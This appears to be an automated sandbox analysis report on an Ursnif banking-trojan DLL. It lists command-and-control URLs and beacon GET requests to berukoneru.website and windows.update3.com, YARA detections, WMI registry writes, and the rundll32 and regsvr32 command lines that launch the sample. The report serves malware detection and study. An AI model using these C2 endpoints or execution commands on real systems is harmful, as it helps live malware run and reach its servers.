            Source: rundll32.exe, 00000004.00000003.362934990.0000000000F9E000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.362827191.0000000000F9E000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.522837424.0000000000F9E000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.372692121.0000000000F9E000.00000004.00000001.sdmp | String found in binary or memory: https://berukoneru.website/O
            Source: regsvr32.exe, 00000002.00000003.362364384.000000000336B000.00000004.00000001.sdmp | String found in binary or memory: https://berukoneru.website/j
            Source: regsvr32.exe, 00000002.00000003.522837252.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.363514151.00000000033C1000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.372687409.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.372837778.00000000033C0000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.419406202.000000000336B000.00000004.00000001.sdmp | String found in binary or memory: https://berukoneru.website/jP
            Source: regsvr32.exe, 00000002.00000003.362160768.00000000033C0000.00000004.00000001.sdmp | String found in binary or memory: https://berukoneru.website/tire/5Dw6h1nh0yZR8l/CEdpvqzTXmbvA8zN38_2F/HfVXZtPlGclvWlY_/2F2pmmVAx7s9on
            Source: rundll32.exe, 00000004.00000003.365155224.0000000000FF2000.00000004.00000001.sdmp | String found in binary or memory: https://berukoneru.website/tire/BkVC2TYPKwX7I/d18vbD7j/LfTctW1YFOCxVg72R7OOyCe/FNM87YiO3R/kqhypryuHY
            Source: rundll32.exe, 00000004.00000003.365155224.0000000000FF2000.00000004.00000001.sdmp | String found in binary or memory: https://berukoneru.website/tire/SxP522LQqV7N0J/d6o3ODGgGiBAGfgE9kDAi/iJ3hZ0ExIl8p4ocR/5jXJfG8mFLCjP7
            Source: loaddll32.exe, 00000000.00000003.372896811.0000000001341000.00000004.00000001.sdmp | String found in binary or memory: https://berukoneru.website/tire/iH0556GjtiGQk4lyd6/e4eJ66Hyx/L2n2id7yGxzkaZSAZenq/25xy0D1xFkintWrbCA
            Source: regsvr32.exe, 00000002.00000003.362615512.00000000033C1000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.372837778.00000000033C0000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.419406202.000000000336B000.00000004.00000001.sdmp | String found in binary or memory: https://berukoneru.website/tire/iL5Q0EgKDzXlIJvSVY9Fa72/roFEnyYEEO/BTl6hhjqhLPztNm87/ClBTSTJ24YQi/65
            Source: regsvr32.exe, 00000002.00000003.372829342.000000000335B000.00000004.00000001.sdmp | String found in binary or memory: https://berukoneru.website/tire/xfoS5YiSnq/LOnpfmnBMaAwxRNJT/gKlVrjFyFJq8/T2InmpA9wuO/M0panYR_2BpfjL
            Source: rundll32.exe, 00000003.00000003.362882057.00000000008D7000.00000004.00000001.sdmp | String found in binary or memory: https://berukoneru.website/tyi
            Source: rundll32.exe, 00000004.00000003.372839349.0000000000FF2000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.372692121.0000000000F9E000.00000004.00000001.sdmp | String found in binary or memory: https://berukoneru.website:443/tire/gAFUHu83b7fr5ftbr5O9tX/NNJYheBEZ_2Bt/wXhf6hyZ/iBEWHVb19RFKuDukD6
            Source: regsvr32.exe, 00000002.00000003.522837252.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.363867556.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.372687409.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.419406202.000000000336B000.00000004.00000001.sdmp | String found in binary or memory: https://berukoneru.website:443/tire/iL5Q0EgKDzXlIJvSVY9Fa72/roFEnyYEEO/BTl6hhjqhLPztNm87/ClBTSTJ24YQ
            Source: powershell.exe, 00000018.00000003.396802391.000001497A5C1000.00000004.00000001.sdmp | String found in binary or memory: https://github.com/Pester/Pester
            Source: rundll32.exe, 00000004.00000003.316654509.0000000000FFE000.00000004.00000001.sdmp | String found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4xdax"
            Source: 6.dll | String found in binary or memory: https://nodejs.org0
            Source: loaddll32.exe, 00000000.00000003.317582164.000000000139F000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.317644552.00000000013B1000.00000004.00000001.sdmp | String found in binary or memory: https://statics-marketingsites-eus-ms-com.akamaized.net/statics/override.css
            Source: regsvr32.exe, 00000002.00000003.363867556.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.372687409.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.362364384.000000000336B000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000003.361019833.0000000003383000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.361512151.0000000000F9E000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.362934990.0000000000F9E000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.362827191.0000000000F9E000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.364485968.0000000000F9E000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.372692121.0000000000F9E000.00000004.00000001.sdmp | String found in binary or memory: https://windows.update3.com/
            Source: regsvr32.exe, 00000002.00000003.361178760.000000000335B000.00000004.00000001.sdmp | String found in binary or memory: https://windows.update3.com/tire/clW2f_2FhATNrnqvBey5XJ/HMTv6hdufnhb6/_2BVSemT/sKeyn9puL2fpAeyTFFwZv
            Source: rundll32.exe, 00000004.00000003.361512151.0000000000F9E000.00000004.00000001.sdmp | String found in binary or memory: https://windows.update3.com/tire/h5hri2qU3j_2/FtKGoeU1cGb/_2B9_2FVlXXJXe/pIon3PPVjwV3l856n6O1d/JfgtT
            Source: 6.dll | String found in binary or memory: https://www.digicert.com/CPS0
            Source: 6.dll | String found in binary or memory: https://www.globalsign.com/repository/0
            Source: 6.dll | String found in binary or memory: https://www.globalsign.com/repository/03
            Source: unknown | DNS traffic detected: queries for: windows.update3.com
            Source: global traffic | HTTP traffic detected: GET /tire/5Dw6h1nh0yZR8l/CEdpvqzTXmbvA8zN38_2F/HfVXZtPlGclvWlY_/2F2pmmVAx7s9onw/Df8mv9bGmzrCq_2BDh/Avhzr_2BW/zhUOFRSj_2Brp9dFi25e/XIimtsTVgbS8Ddk4Jlg/q7ifDAWTLXmxh8fPSAYnUc/3K8xDlQvgKVYD/9E1TEXJC/aPKjFJSRgVkfUwKBYWKDgLh/VONwiC9wK5/3CPG7RAhZST/_2FDfWf.eta HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: berukoneru.website
            Source: global traffic | HTTP traffic detected: GET /tire/BkVC2TYPKwX7I/d18vbD7j/LfTctW1YFOCxVg72R7OOyCe/FNM87YiO3R/kqhypryuHYA4xvaox/Zos6wfhvU6Vx/dZ_2FhTkVUm/dQ1eWiBdVQx_2F/3MQ4AfN6CRhAz7ojdkAuB/vyHN6D_2BnDaccRD/rxLm6HRGflkJaqH/HtsgyaJ8NMuefJHJTr/vf407nMOm/3YNEpWUoxMPlA61ciEA5/ZB4w8oLbC0y/cC.eta HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: berukoneru.website
            Source: global traffic | HTTP traffic detected: GET /tire/fGFKjH5BjbdZz4tmUO5m/ZAUfPXxElw8Dkm9Cfh9/xqmrK6ieQrOr54I1y1Md2B/CJZjvCZRXK_2B/c6YLK40A/ibGCXB5z8qRJaf9iUFEBazW/9sEXIVndb3/DsRsV2z8TCrjx7mBI/rTZxp021lQBU/ESMggS1gJ_2/Bi3Bcj9_2B8Xf4/Xr9j2PgVhY9_2FzIeDatB/WE3DM_2B4ZBLmr9g/bExshi993/JbJC0wJJ/U.eta HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: berukoneru.website
            Source: global traffic | HTTP traffic detected: GET /tire/cFJsSWAGWE/z2qui_2Bz1BNPPVC8/40cjfJwuY_2F/qeMRrcIZBVG/Ne0YpnkwEJfIh3/f5okxbrq_2FXxzqJmpSlY/lBFuBWEAi70a61Vy/5QzGUBrPY97n5jQ/Uty84umyFnIA829ewc/61TtijfTY/zF0ZOoxI3N5pWHzggULR/QMXY_2F7FMDggc4thO7/G_2BQV4WNp08p5XmI0/TT.eta HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: berukoneru.website
            Source: global traffic | HTTP traffic detected: GET /tire/iL5Q0EgKDzXlIJvSVY9Fa72/roFEnyYEEO/BTl6hhjqhLPztNm87/ClBTSTJ24YQi/659nN8frXqL/KI_2BmGQcF3l8a/UPJEdWRElF2Ck7h3GrI7f/Jn4UaIHKOCKly3pR/5WtUgfhtCob3WA8/8RFl0SkPd8NK0tapfV/Bv03ARxcw/T6wxTs3S_2BFMRgrZw2Q/_2BV_2F7vXjmj/i.eta HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: berukoneru.website
            Source: global traffic | HTTP traffic detected: GET /tire/9IgUYNG9/P9N8jGg62VAhbwmUeolHFCg/K1HN9iUPdi/an2HdiNP_2FRIROSF/l9uR7XFSquKc/cTL90RaThvy/4LigE_2BC67Pa2/OL_2Fq6LzSFfAjBrcF1my/5AUpi_2BYfx15AAS/Ho8688ZDo7zPK6r/e_2F4ZPz87sJSle6kT/I1gJ4hikp/cCibgdVeBM9n2ccXEO18/D4MJBqmD.eta HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: berukoneru.website
            Source: global traffic | HTTP traffic detected: GET /tire/iH0556GjtiGQk4lyd6/e4eJ66Hyx/L2n2id7yGxzkaZSAZenq/25xy0D1xFkintWrbCAo/f_2Bdm0MJPWq7ugWEYUqSU/PtgL_2FeeZv0h/UCRQYI_2/FefNYP32vk23pbK3jV8vqXP/0Ovr3EWUID/eiKH_2Fkr5cf0tXqX/_2BscW0pxtbY/lmzrmCcsUPq/Hp_2BA_2BliXkb/fgGnQnQH8/_2B.eta HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: berukoneru.website
            Source: global traffic | HTTP traffic detected: GET /tire/SxP522LQqV7N0J/d6o3ODGgGiBAGfgE9kDAi/iJ3hZ0ExIl8p4ocR/5jXJfG8mFLCjP71/7NSaKdzhGeEI1UdiPa/8FnVHvkbS/kpLNStxRjAnliuJ5EZNG/gq3G4NvVU_2BCUhovI0/u7jwUo5n_2BL68IOoZxv34/oRctSCfqONUBa/hRxyIlRY/aB2W4yGH6sVrPB1xJM1YXlq/jJC_2B1iv6kvD5/bMsiwtIS.eta HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: berukoneru.website
            Source: global traffic | HTTP traffic detected: GET /tire/xfoS5YiSnq/LOnpfmnBMaAwxRNJT/gKlVrjFyFJq8/T2InmpA9wuO/M0panYR_2BpfjL/QVPhPbWeSwRVFSzMJ6Vcg/Y9VyT4fbhoZ82vwq/2GIivBsbax9rQUh/n7Uc5KQo0J8ysVLUlr/XSTAmgKJY/zcSJprSz5_2F2B_2Bsbt/2juDsOXqzjP5XLZ_2FP/WpBTOnAHWcoi3w7ov9P0p8/2Wzq8vdJF/5Vrog3ES/Q.eta HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: berukoneru.website
            Source: global traffic | HTTP traffic detected: GET /tire/4rLoqSurzyu0/faIn56YEFho/0rtfGJwOQq2F5c/BJoAXiIiU_2F9ZRU2hBse/gAViRvyFsSwGVefa/kRvG3X29VJojGH9/HHkJOTdVe7Nqn26zmq/y4GSGdPZu/kOhHaVJwE10tGTyVEPor/Cm7rt8Rg13eBm6Sc7Sm/5BVZ_2BPytM06u32e6Y8Q1/6dRgyXIz2yrBpW/dgW2i.eta HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: berukoneru.website
            Source: global traffic | HTTP traffic detected: GET /tire/o4Wh2yGKlAclIXiSKni/E2GRbJwAfyjZDLvIiDUTZP/MYjyQpBnAiuxp/RCS8IZuc/T6rd9RjJyTuIO59AdkBUbyh/AeLhgjzVcK/R628sGYn00PGPEGL1/qe_2FhyY_2B4/KAdwjy0pLGn/wY1nXPl9lZfHBx/mKriUsf47w97_2F05n24c/_2B3uV0T1ULXF_2F/rws1Po8g_2B5W/rqgHz.eta HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: berukoneru.website
            Source: global traffic | HTTP traffic detected: GET /tire/gAFUHu83b7fr5ftbr5O9tX/NNJYheBEZ_2Bt/wXhf6hyZ/iBEWHVb19RFKuDukD6ImzPG/nqeMvnB_2B/0lgxK72Q_2BWOlTx_/2BHVUq8DywzL/dSOEptmJdkD/639IuGSCq9GXlR/PUHxRfZnx0Of7xPsoVOC_/2FTMAnj0YKLpX9By/omZGYbxoocAN6vP/PuGPVsc2wwxbBsmHOU/YqsK1vpPn/dCIkRouQqQLmE/5L.eta HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: berukoneru.website
            Source: unknown | HTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.5:49795 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.5:49796 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.5:49797 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.5:49798 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.5:49799 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.5:49801 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.5:49802 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.5:49803 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.5:49805 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.5:49806 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.5:49807 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.5:49808 version: TLS 1.2

            Key, Mouse, Clipboard, Microphone and Screen Capturing:

            Yara detected Ursnif
            Source: Yara match | File source: 00000004.00000003.364280068.000000000557D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000003.316367709.00000000059A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000003.482173365.000000000557D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000003.364396735.000000000507D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000000.00000003.317676885.00000000039A8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000000.00000003.363061307.000000000372D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000003.482158894.000000000572D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000003.418329153.0000000005C78000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000003.363790330.000000000572D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000003.340116197.000000000517B000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000003.316726446.00000000057F8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000003.363641305.000000000507D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000000.00000003.434428828.0000000004A88000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000003.418350281.0000000006148000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000003.316760481.00000000052F8000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000003.487230410.000000000507D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000000.00000003.364605530.000000000372D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000003.364538773.000000000572D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000003.339988265.000000000567B000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000003.362673696.000000000557D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000000.00000003.364182389.000000000372D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000003.364803620.000000000507D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000003.418338276.0000000006518000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000003.339523552.000000000582B000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000000.00000003.340805268.000000000382B000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000000.00000003.487250466.000000000372D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000003.365593483.000000000557D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000003.362522995.000000000572D000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: loaddll32.exe PID: 6360, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: regsvr32.exe PID: 6388, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 6400, type: MEMORYSTR
            Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 6424, type: MEMORYSTR

            E-Banking Fraud:

            Yara detected Ursnif (same memory-dump and process-memory matches as listed under Key, Mouse, Clipboard, Microphone and Screen Capturing)

            System Summary:

            PE file has a writeable .text section
            Source: 6.dll | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Writes or reads registry keys via WMI
            Source: C:\Windows\System32\loaddll32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
            Source: C:\Windows\System32\loaddll32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
            Source: C:\Windows\System32\loaddll32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\System32\loaddll32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\System32\loaddll32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
            Source: C:\Windows\System32\loaddll32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\System32\loaddll32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\System32\loaddll32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
            Source: C:\Windows\System32\loaddll32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\System32\loaddll32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\System32\loaddll32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
            Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
            Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
            Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
            Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Writes registry values via WMI
Source: C:\Windows\System32\loaddll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: 6.dll | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_00F1B084
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_00F13373
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_00F1294D
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_00F16C06 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_00F165B4 NtMapViewOfSection,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_00F17562 GetProcAddress,NtCreateSection,memset,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_00F1B2A9 NtQueryVirtualMemory,
Source: 6.dll | Binary or memory string: OriginalFilenameSymErr.exeT vs 6.dll
Source: 6.dll | Binary or memory string: OriginalFilenameNsc.exe. vs 6.dll
Source: 6.dll | Binary or memory string: OriginalFilenamebyInstallHelper.exe. vs 6.dll
Source: 6.dll | Binary or memory string: OriginalFilenameBgRegister.exe4 vs 6.dll
Source: C:\Windows\System32\mshta.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\System32\mshta.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\System32\mshta.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\System32\mshta.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: 6.dll | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST (this entry is repeated 60 times in the report, one per RT_ICON resource)
Source: C:\Windows\SysWOW64\regsvr32.exe | Section loaded: sfc.dll
Source: 6.dll | Static PE information: invalid certificate
Source: 6.dll | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\loaddll32.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown | Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\6.dll"
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\6.dll",#1
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\6.dll
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\6.dll",#1
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\6.dll,DllRegisterServer
